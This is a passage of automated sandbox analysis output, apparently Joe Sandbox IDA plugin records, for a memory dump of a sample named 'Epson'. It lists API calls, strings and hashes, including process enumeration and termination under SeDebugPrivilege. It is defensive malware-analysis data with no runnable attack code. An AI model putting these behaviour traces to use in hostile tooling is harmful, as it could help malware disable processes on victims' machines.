                                                                                                                                                                                                                                      • API String ID: 1957940570-0
                                                                                                                                                                                                                                      • Opcode ID: 365dd04080b5ff945aa5e018d637f3d7b2185f4af2b605a251849bb6b5107d8c
                                                                                                                                                                                                                                      • Instruction ID: a7bb8bbbd1cec20bc80be0c98685385a6022226c0fc2cc7507d175c52126d59f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 365dd04080b5ff945aa5e018d637f3d7b2185f4af2b605a251849bb6b5107d8c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B601B6B5240348BFEB10AFA5DC8DF6B7BACEB89711F008411FA05DF6A1CA759800DB21
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00FBDD87: CreateToolhelp32Snapshot.KERNEL32 ref: 00FBDDAC
                                                                                                                                                                                                                                        • Part of subcall function 00FBDD87: Process32FirstW.KERNEL32(00000000,?), ref: 00FBDDBA
                                                                                                                                                                                                                                        • Part of subcall function 00FBDD87: CloseHandle.KERNEL32(00000000), ref: 00FBDE87
                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00FDABCA
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00FDABDD
                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00FDAC10
                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00FDACC5
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000), ref: 00FDACD0
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00FDAD21
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                                                                                      • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                      • API String ID: 2533919879-2896544425
                                                                                                                                                                                                                                      • Opcode ID: be018070fc17859bd0820131b05165e5d6ed6a75062a0538c6331d66373cc7bb
                                                                                                                                                                                                                                      • Instruction ID: c1c360c9e663de5b2b539b6ab884068346512432a00834fdf91cf7e6e5c40aa3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: be018070fc17859bd0820131b05165e5d6ed6a75062a0538c6331d66373cc7bb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BA61DE31614242AFD314DF14C884F25BBE2AF44328F18848DE8664FBA3C775ED49EB92
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00FE43C1
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00FE43D6
                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00FE43F0
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FE4435
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00FE4462
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00FE4490
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Window_wcslen
                                                                                                                                                                                                                                      • String ID: SysListView32
                                                                                                                                                                                                                                      • API String ID: 2147712094-78025650
                                                                                                                                                                                                                                      • Opcode ID: b0a753f52740ecb5f91b6f912c9c1da405a63189f1a0cfcc4dc974440412cef4
                                                                                                                                                                                                                                      • Instruction ID: 46acad33b810dd7f2fc59d20cd351d57c1c543414c059855602c15686814030d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b0a753f52740ecb5f91b6f912c9c1da405a63189f1a0cfcc4dc974440412cef4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9641D531E00349ABDF21DF65CC49BEA77A9FF48360F10012AF948E7291D775A980EB90
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FBC6C4
                                                                                                                                                                                                                                      • IsMenu.USER32(00000000), ref: 00FBC6E4
                                                                                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 00FBC71A
                                                                                                                                                                                                                                      • GetMenuItemCount.USER32(01206558), ref: 00FBC76B
                                                                                                                                                                                                                                      • InsertMenuItemW.USER32(01206558,?,00000001,00000030), ref: 00FBC793
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                                                                                      • String ID: 0$2
                                                                                                                                                                                                                                      • API String ID: 93392585-3793063076
                                                                                                                                                                                                                                      • Opcode ID: cb47c46e3d2506eef86e9ef02e03e2f8a81d2b856719f93701bdd92ab263e13d
                                                                                                                                                                                                                                      • Instruction ID: 5358700f20c619e31030e948044c61b436c838b78638e3e04de3c52a62ee6318
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cb47c46e3d2506eef86e9ef02e03e2f8a81d2b856719f93701bdd92ab263e13d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E519D74A002059BDF10CF6AC884BEFBBF9AF44324F34421AE9159B291DB709941EFA1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00007F03), ref: 00FBD1BE
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: IconLoad
                                                                                                                                                                                                                                      • String ID: blank$info$question$stop$warning
                                                                                                                                                                                                                                      • API String ID: 2457776203-404129466
                                                                                                                                                                                                                                      • Opcode ID: f84f2e34cdaeff4080cf33ec72810cd2ffbcb70da8591db046837cbc643d5753
                                                                                                                                                                                                                                      • Instruction ID: 39a0aa7bc8afa1503ea7e5eeddea6408c86debaecafc5c699c6c966d3d4f8fe1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f84f2e34cdaeff4080cf33ec72810cd2ffbcb70da8591db046837cbc643d5753
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 52110A76649306BBF7055B5ADC82DEA779CDF05770F20002AF944EA181F7B96A006963
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                                      • String ID: 0.0.0.0
                                                                                                                                                                                                                                      • API String ID: 642191829-3771769585
                                                                                                                                                                                                                                      • Opcode ID: d1225888244664b2989cfedc6a242a7abea6ccede312969bfe374c6f244d0593
                                                                                                                                                                                                                                      • Instruction ID: b16401c794223c0e75f1015e5304292c8f7a694c6adf301f5825dc149280277b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d1225888244664b2989cfedc6a242a7abea6ccede312969bfe374c6f244d0593
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED11D632900159BFCB24A765DC8AEDE77BCEF41720F1000B6F555AA091EFB89A81BA51
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _wcslen$LocalTime
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 952045576-0
                                                                                                                                                                                                                                      • Opcode ID: 196cdb05febfff54e5f179326c9f65e18f07454af966c198abe36d2493ce590b
                                                                                                                                                                                                                                      • Instruction ID: 777974cb40d7c80220e5f67926bcc1752b8d2f40929ce4c449f3615cdcec5ccb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 196cdb05febfff54e5f179326c9f65e18f07454af966c198abe36d2493ce590b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA419265D10518B6CB11EBB8CC8AACFB7A8AF05310F608463E50DE3121FB38E255D7A7
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00F939E2,00000004,00000000,00000000), ref: 00F6FC41
                                                                                                                                                                                                                                      • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00F939E2,00000004,00000000,00000000), ref: 00FAFC15
                                                                                                                                                                                                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00F939E2,00000004,00000000,00000000), ref: 00FAFC98
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ShowWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1268545403-0
                                                                                                                                                                                                                                      • Opcode ID: 5a2784328d0cc4c58e93dcd338fed00468c2272b790e8833152cb47e5af2ac3f
                                                                                                                                                                                                                                      • Instruction ID: 41bce6107e6ca0908811f284bb102bcec96e82c048d0ee5c14397aa68de497dd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5a2784328d0cc4c58e93dcd338fed00468c2272b790e8833152cb47e5af2ac3f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D2412B71A083CC9EC7358B79E9C8B397B92AB87370F14453CE9474AA64C635AA4CF711
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00FE37B7
                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 00FE37BF
                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FE37CA
                                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00FE37D6
                                                                                                                                                                                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00FE3812
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00FE3823
                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00FE6504,?,?,000000FF,00000000,?,000000FF,?), ref: 00FE385E
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00FE387D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3864802216-0
                                                                                                                                                                                                                                      • Opcode ID: 71e8b8bed17ac0d936ac5d371d067e4647e3a23dc5a6d3e0e0c47a5462f6c437
                                                                                                                                                                                                                                      • Instruction ID: 4e7fd72d5f8238a5ba26e1634a98cfdd04e4778080c559e195c8b6b81f8c4038
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 71e8b8bed17ac0d936ac5d371d067e4647e3a23dc5a6d3e0e0c47a5462f6c437
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09319C72201258BFEB118F51CC89FEB3BA9EF49761F044065FE089E291C6B59D41DBA0
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                                                      • API String ID: 0-572801152
                                                                                                                                                                                                                                      • Opcode ID: e0ac11150046a13c33849cd9e458bad723faf3017d8d233b37f58893fd7aeb6b
                                                                                                                                                                                                                                      • Instruction ID: 9ca4837cbb87e5d12996e15de74d7089a21e2738e070000e009be66b5aea40a0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e0ac11150046a13c33849cd9e458bad723faf3017d8d233b37f58893fd7aeb6b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 30D19F71A0060A9FDF10CF68C885AAEB7B6BF48714F18816AE915AB381D770ED45DB60
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00F91B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00F9194E
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00F91B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00F919D1
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00F91B7B,?,00F91B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00F91A64
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00F91B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00F91A7B
                                                                                                                                                                                                                                        • Part of subcall function 00F83B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00F76A79,?,0000015D,?,?,?,?,00F785B0,000000FF,00000000,?,?), ref: 00F83BC5
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00F91B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00F91AF7
                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 00F91B22
                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 00F91B2E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2829977744-0
                                                                                                                                                                                                                                      • Opcode ID: a74345ee56be0702a78b7938253558c6e4fbc5488f4ab04bd9a160028dbbbccd
                                                                                                                                                                                                                                      • Instruction ID: 8e62daf735e26a4cd39b8a062eb0859757507cf3d6311fe3941c6c1a7fbee50f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a74345ee56be0702a78b7938253558c6e4fbc5488f4ab04bd9a160028dbbbccd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6291B272E012179EFF258E64CC91AEE7BB6BF49320F180679E805E7180E729DC41E760
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Variant$ClearInit
                                                                                                                                                                                                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                                                                      • API String ID: 2610073882-625585964
                                                                                                                                                                                                                                      • Opcode ID: ef4db64e84794be336217a8620388612033542a702e02af7d7bf59765ed4f091
                                                                                                                                                                                                                                      • Instruction ID: 90452b0fce005336d0d9389426bf1bd67e001c64a80625fcb50c5987cbfa3044
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ef4db64e84794be336217a8620388612033542a702e02af7d7bf59765ed4f091
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3791B471E00619ABDF20CFA4CC48FAEBBB9EF45B24F14851AF515AB280D7709945DFA0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00FC1C1B
                                                                                                                                                                                                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00FC1C43
                                                                                                                                                                                                                                      • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00FC1C67
                                                                                                                                                                                                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00FC1C97
                                                                                                                                                                                                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00FC1D1E
                                                                                                                                                                                                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00FC1D83
                                                                                                                                                                                                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00FC1DEF
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2550207440-0
                                                                                                                                                                                                                                      • Opcode ID: e555d7fc44ff17c2d9addacc24c8e2c513ac114316179760f1af6333e99d5cbc
                                                                                                                                                                                                                                      • Instruction ID: 7b847581f83393596d89ce03b6f9987bb76a3156ef8d2e5a8fa9a7a3a77b7320
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e555d7fc44ff17c2d9addacc24c8e2c513ac114316179760f1af6333e99d5cbc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2291E272A0021A9FDB01DF94C986FFEB7B4FF06721F108019E941EB292D778A955EB50
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00FD43C8
                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00FD44D7
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FD44E7
                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00FD467C
                                                                                                                                                                                                                                        • Part of subcall function 00FC169E: VariantInit.OLEAUT32(00000000), ref: 00FC16DE
                                                                                                                                                                                                                                        • Part of subcall function 00FC169E: VariantCopy.OLEAUT32(?,?), ref: 00FC16E7
                                                                                                                                                                                                                                        • Part of subcall function 00FC169E: VariantClear.OLEAUT32(?), ref: 00FC16F3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
